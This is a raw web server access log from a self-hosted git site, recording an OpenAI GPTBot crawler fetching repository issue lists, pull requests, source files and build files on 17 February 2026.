"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=closed&type=all" -[17/Feb/2026:18:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=closed&type=all" -[17/Feb/2026:18:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10140] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:18:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9958] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" -[17/Feb/2026:18:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:18:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:18:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2funinstall_service.bat" [Client 74.7.227.38] [Length 23294] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:18:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=latest&state=open&type=all" -[17/Feb/2026:18:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 60378] [Gzip 23.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md?display=rendered" [Client 74.7.227.38] [Length 13365] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:18:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" -[17/Feb/2026:18:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:54:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:54:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:18:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" -[17/Feb/2026:18:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fOpcUaMinimal.csproj" [Client 74.7.227.38] [Length 21822] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:18:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 12714] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:18:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" -[17/Feb/2026:18:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" -[17/Feb/2026:18:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 